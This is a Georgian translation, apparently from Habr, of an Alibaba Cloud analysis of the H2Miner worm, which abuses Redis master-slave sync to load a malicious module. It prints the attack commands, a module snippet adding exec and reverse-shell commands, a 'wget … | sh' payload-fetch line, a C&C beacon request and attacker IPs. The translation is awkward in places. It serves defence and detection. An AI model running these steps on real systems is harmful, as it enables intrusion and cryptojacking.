აღმოჩენილია H2Miner ჭიების ახალი აფეთქება, რომელიც იყენებს Redis RCE-ს

ერთი დღის წინ, ჩემი პროექტის ერთ-ერთ სერვერს დაესხა მსგავსი ჭია. კითხვაზე "რა იყო ეს?" პასუხის ძიებაში. ვიპოვე შესანიშნავი სტატია Alibaba Cloud Security გუნდის მიერ. ვინაიდან ეს სტატია Habré-ზე ვერ ვიპოვე, გადავწყვიტე მისი თარგმნა სპეციალურად თქვენთვის <3

Entry

ცოტა ხნის წინ, Alibaba Cloud-ის უსაფრთხოების ჯგუფმა აღმოაჩინა H2Miner-ის უეცარი აფეთქება. ამ ტიპის მავნე ჭია იყენებს ავტორიზაციის ნაკლებობას ან სუსტ პაროლს Redis-ისთვის, როგორც კარიბჭეები თქვენს სისტემაში, რის შემდეგაც იგი სინქრონიზებს საკუთარ მავნე მოდულს მონასთან master-slave სინქრონიზაციის გზით და ბოლოს ჩამოტვირთავს ამ მავნე მოდულს თავდასხმულ მანქანაში და ახორციელებს მავნე მოდულს. ინსტრუქციები.

წარსულში, თქვენს სისტემებზე თავდასხმები ძირითადად განხორციელდა მეთოდის გამოყენებით, რომელიც მოიცავს დაგეგმილ ამოცანებს ან SSH კლავიშებს, რომლებიც დაიწერა თქვენს კომპიუტერში მას შემდეგ, რაც თავდამსხმელი შევიდა Redis-ში. საბედნიეროდ, ამ მეთოდის ხშირად გამოყენება შეუძლებელია ნებართვის კონტროლის პრობლემების გამო ან სისტემის სხვადასხვა ვერსიების გამო. თუმცა, მავნე მოდულის ჩატვირთვის ამ მეთოდს შეუძლია უშუალოდ შეასრულოს თავდამსხმელის ბრძანებები ან მოიპოვოს წვდომა ჭურვზე, რაც საშიშია თქვენი სისტემისთვის.

ინტერნეტში განთავსებული Redis სერვერების დიდი რაოდენობის გამო (დაახლოებით 1 მილიონი), Alibaba Cloud-ის უსაფრთხოების გუნდი, როგორც მეგობრული შეხსენება, ურჩევს მომხმარებლებს არ გააზიარონ Redis ონლაინ და რეგულარულად შეამოწმონ მათი პაროლების სიძლიერე და არის თუ არა ისინი კომპრომეტირებული. სწრაფი შერჩევა.

H2Miner

H2Miner არის მაინინგ ბოტნეტი Linux-ზე დაფუძნებული სისტემებისთვის, რომელსაც შეუძლია შეიჭრას თქვენს სისტემაში სხვადასხვა გზით, მათ შორის ავტორიზაციის არარსებობა Hadoop yarn, Docker და Redis დისტანციური ბრძანების შესრულების (RCE) დაუცველობებში. ბოტნეტი მუშაობს მავნე სკრიპტებისა და მავნე პროგრამების ჩამოტვირთვით თქვენი მონაცემების მოსაპოვებლად, შეტევის ჰორიზონტალურად გაფართოების და ბრძანებისა და კონტროლის (C&C) კომუნიკაციების შესანარჩუნებლად.

Redis RCE

ცოდნა ამ თემაზე პაველ ტოპორკოვმა გააზიარა ZeroNights 2018-ზე. 4.0 ვერსიის შემდეგ, Redis მხარს უჭერს დანამატის ჩატვირთვის ფუნქციას, რომელიც მომხმარებლებს აძლევს შესაძლებლობას ჩატვირთონ ფაილები C-ით შედგენილი Redis-ში, რათა შეასრულონ კონკრეტული Redis ბრძანებები. ეს ფუნქცია, თუმცა სასარგებლოა, შეიცავს დაუცველობას, რომელშიც, master-slave რეჟიმში, ფაილების სინქრონიზაცია შესაძლებელია slave-თან სრული სინქრონიზაციის რეჟიმის მეშვეობით. ეს შეიძლება გამოიყენოს თავდამსხმელმა მავნე ფაილების გადასატანად. გადაცემის დასრულების შემდეგ, თავდამსხმელები ატვირთავენ მოდულს თავდასხმულ Redis ინსტანციაზე და ასრულებენ ნებისმიერ ბრძანებას.

მავნე ჭიების ანალიზი

ცოტა ხნის წინ, Alibaba Cloud-ის უსაფრთხოების ჯგუფმა აღმოაჩინა, რომ H2Miner მავნე მაინერების ჯგუფის ზომა მოულოდნელად მკვეთრად გაიზარდა. ანალიზის მიხედვით, თავდასხმის წარმოშობის ზოგადი პროცესი შემდეგია:

H2Miner იყენებს RCE Redis-ს სრულფასოვანი შეტევისთვის. თავდამსხმელები პირველ რიგში თავს ესხმიან დაუცველ Redis სერვერებს ან სერვერებს სუსტი პაროლებით.

შემდეგ ისინი იყენებენ ბრძანებას config set dbfilename red2.so ფაილის სახელის შესაცვლელად. ამის შემდეგ თავდამსხმელები ასრულებენ ბრძანებას slaveof მთავარ-სლავის რეპლიკაციის ჰოსტის მისამართის დასაყენებლად.

როდესაც თავდასხმული Redis ინსტანცია ამყარებს კავშირს master-slave მავნე Redis-თან, რომელიც ეკუთვნის თავდამსხმელს, თავდამსხმელი აგზავნის ინფიცირებულ მოდულს fullresync ბრძანების გამოყენებით ფაილების სინქრონიზაციისთვის. red2.so ფაილი შემდეგ ჩამოიტვირთება თავდასხმულ მანქანაში. შემდეგ თავდამსხმელები იყენებენ ./red2.so ჩატვირთვის მოდულს ამ so ფაილის ჩასატვირთად. მოდულს შეუძლია შეასრულოს ბრძანებები თავდამსხმელისგან ან დაიწყოს საპირისპირო კავშირი (უკანა კარი) თავდასხმულ მანქანაზე წვდომის მისაღებად.

if (RedisModule_CreateCommand(ctx, "system.exec",
        DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
      if (RedisModule_CreateCommand(ctx, "system.rev",
        RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;

მავნე ბრძანების შესრულების შემდეგ, როგორიცაა / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, თავდამსხმელი აღადგენს სარეზერვო ფაილის სახელს და გადმოტვირთავს სისტემის მოდულს კვალის გასასუფთავებლად. თუმცა, red2.so ფაილი კვლავ დარჩება თავდასხმულ მანქანაზე. მომხმარებლებს ურჩევენ ყურადღება მიაქციონ ასეთი საეჭვო ფაილის არსებობას მათი Redis ინსტანციის საქაღალდეში.

ზოგიერთი მავნე პროცესის მოკვლის გარდა რესურსების მოპარვის მიზნით, თავდამსხმელი მოჰყვა მავნე სკრიპტს მავნე ორობითი ფაილების ჩამოტვირთვით და შესრულებით. 142.44.191.122 / ნათესავი. ეს ნიშნავს, რომ პროცესის სახელი ან დირექტორიის სახელი, რომელიც შეიცავს კინზინგს ჰოსტზე, შეიძლება მიუთითებდეს, რომ მანქანა დაინფიცირდა ამ ვირუსით.

საპირისპირო საინჟინრო შედეგების მიხედვით, მავნე პროგრამა ძირითადად ასრულებს შემდეგ ფუნქციებს:

• ფაილების ატვირთვა და მათი შესრულება
• სამთო
• C&C კომუნიკაციის შენარჩუნება და თავდამსხმელის ბრძანებების შესრულება

გამოიყენეთ Mascan გარე სკანირებისთვის თქვენი გავლენის გასაფართოებლად. გარდა ამისა, C&C სერვერის IP მისამართი მყარად კოდირებულია პროგრამაში და თავდასხმის მქონე ჰოსტი დაუკავშირდება C&C საკომუნიკაციო სერვერს HTTP მოთხოვნის გამოყენებით, სადაც ზომბი (გატეხილი სერვერის) ინფორმაცია იდენტიფიცირებულია HTTP სათაურში.

GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip

თავდასხმის სხვა მეთოდები

ჭიის მიერ გამოყენებული მისამართები და ბმულები

/ნათესავი

• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh

ს და კ

• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193

რჩევები

პირველი, Redis არ უნდა იყოს ხელმისაწვდომი ინტერნეტიდან და დაცული უნდა იყოს ძლიერი პაროლით. ასევე მნიშვნელოვანია, რომ კლიენტებმა შეამოწმონ, რომ არ არის red2.so ფაილი Redis დირექტორიაში და რომ არ არის „kinsing“ ფაილის/პროცესის სახელში ჰოსტზე.

წყარო: www.habr.com